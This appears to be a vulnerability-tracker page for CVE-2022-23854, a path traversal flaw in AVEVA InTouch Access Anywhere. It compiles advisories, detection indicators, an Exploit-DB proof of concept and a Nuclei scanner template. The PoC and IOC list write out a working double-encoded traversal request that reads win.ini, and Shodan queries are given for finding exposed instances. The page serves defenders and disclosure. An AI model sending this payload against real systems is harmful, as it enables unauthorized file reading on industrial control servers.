CVE-2022-23854
published 2022-12-23CVE-2022-23854: AVEVA InTouch Access Anywhere versions 2020 R2 and older are vulnerable to a path traversal exploit that could allow an unauthenticated user with network…
PriorityP273high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
45.96%
98.7th percentile
AVEVA InTouch Access Anywhere versions 2020 R2 and older are vulnerable to a path traversal exploit that could allow an unauthenticated user with network access to read files on the system outside of the secure gateway web server.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aveva | intouch_access_anywhere | < 2020 | 2020 |
| aveva | intouch_access_anywhere | <= 2020 R2 | — |
| aveva | intouch_access_anywhere | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini↗
sigma
shodan-query: http.html:"InTouch Access Anywhere"
- →HTTP GET requests to /AccessAnywhere/ containing double-percent-encoded path traversal sequences (%252e%252e%255c) targeting Windows files (e.g., windows%255cwin.ini) are indicative of CVE-2022-23854 exploitation attempts. ↗
- →Successful exploitation returns HTTP 200 with Content-Type 'text/ini' or 'application/octet-stream' and body containing 'for 16-bit app support' and 'extensions', indicating win.ini was read from the server.
- →The vulnerability is unauthenticated and exploitable remotely with low attack complexity; monitor for unauthenticated access to the /AccessAnywhere/ endpoint with encoded dot-dot-backslash sequences in the URI. ↗
- →Identify exposed AVEVA InTouch Access Anywhere instances via Shodan (http.html:"InTouch Access Anywhere") or FOFA (body="intouch access anywhere") to assess attack surface.
- ·The path traversal payload uses double percent-encoding (%252e%252e%255c) to bypass input validation; detection rules must account for this double-encoded form rather than standard ../ sequences. ↗
- ·Affected versions are InTouch Access Anywhere 2020 R2 and older (CVE-2022-23854 specific); the CISA Update A advisory expanded affected scope to InTouch Access Anywhere 2023 and prior for related CVEs, but CVE-2022-23854 path traversal applies to 2020 R2 and older. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA ICS
AVEVA InTouch Access Anywhere and Plant SCADA Access Anywhere (Update A)
cisa_ics·2022-12-08·CVSS 7.5
[HIGH] AVEVA InTouch Access Anywhere and Plant SCADA Access Anywhere (Update A)
ICS Advisory
##
AVEVA InTouch Access Anywhere and Plant SCADA Access Anywhere (Update A)
Last RevisedMarch 16, 2023
Alert CodeICSA-22-342-02
## 1. EXECUTIVE SUMMARY
--------- Begin Update A Part 1 of 6 ---------
- CVSS v3 9.8
--------- End Update A Part 1 of 6 ---------
- ATTENTION: Exploitable remotely/low attack complexity/public exploits are available
- Vendor: AVEVA
--------- Begin Update A Part 2 of 6 ---------
- Equipment: InTouch Access Anywhere, Plant SCADA Access Anywhere
- Vulnerability: Relative Path Traversal, Classic Buffer Overflow, Cross-site Scripting
--------- End Update A Part 2 of 6 ---------
## 2. UPDATE INFORMATION
This updated advisory is a follow-up to the original advisory titled ICSA-22-342-02 AVEVA InTouch Access Anywhere, publ
GHSA
GHSA-ccvr-7m85-7g88: AVEVA InTouch Access Anywhere versions 2020 R2 and older are vulnerable to a path traversal exploit that could allow an unauthenticated user with netw
ghsa_unreviewed·2022-12-23
CVE-2022-23854 [HIGH] CWE-22 GHSA-ccvr-7m85-7g88: AVEVA InTouch Access Anywhere versions 2020 R2 and older are vulnerable to a path traversal exploit that could allow an unauthenticated user with netw
AVEVA InTouch Access Anywhere versions 2020 R2 and older are vulnerable to a path traversal exploit that could allow an unauthenticated user with network access to read files on the system outside of the secure gateway web server.
No detection rules found.
Exploit-DB
AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal
exploitdb·2022-11-11·CVSS 7.5
CVE-2022-23854 [HIGH] AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal
AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal
---
Exploit Title: AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal
Exploit Author: Jens Regel (CRISEC IT-Security)
Date: 11/11/2022
CVE: CVE-2022-23854
Version: Access Anywhere Secure Gateway versions 2020 R2 and older
Proof of Concept:
GET
/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
HTTP/1.1
HTTP/1.1 200 OK
Server: EricomSecureGateway/8.4.0.26844.*
(..)
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
Nuclei
AVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion
nuclei·CVSS 7.5
CVE-2022-23854 [HIGH] AVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion
AVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion
AVEVA InTouch Access Anywhere Secure Gateway is vulnerable to local file inclusion.
Template:
id: CVE-2022-23854
info:
name: AVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion
author: For3stCo1d
severity: high
description: |
AVEVA InTouch Access Anywhere Secure Gateway is vulnerable to local file inclusion.
impact: |
An attacker can access sensitive information stored on the server, potentially leading to further exploitation or unauthorized access.
remediation: |
Apply the latest security patches or updates provided by AVEVA to fix the local file inclusion vulnerability.
reference:
- https://packetstormsecurity.com/files/cve/CVE-2022-23854
- https://www.aveva.com
- https://crisec.de/advisory-aveva-int
https://crisec.de/advisory-aveva-intouch-access-anywhere-secure-gateway-path-traversalhttps://www.aveva.com/content/dam/aveva/documents/support/cyber-security-updates/SecurityBulletin_AVEVA-2023-001_r.pdfhttps://www.cisa.gov/uscert/ics/advisories/icsa-22-342-02https://crisec.de/advisory-aveva-intouch-access-anywhere-secure-gateway-path-traversalhttps://www.aveva.com/content/dam/aveva/documents/support/cyber-security-updates/SecurityBulletin_AVEVA-2023-001_r.pdfhttps://www.cisa.gov/uscert/ics/advisories/icsa-22-342-02
2022-12-23
Published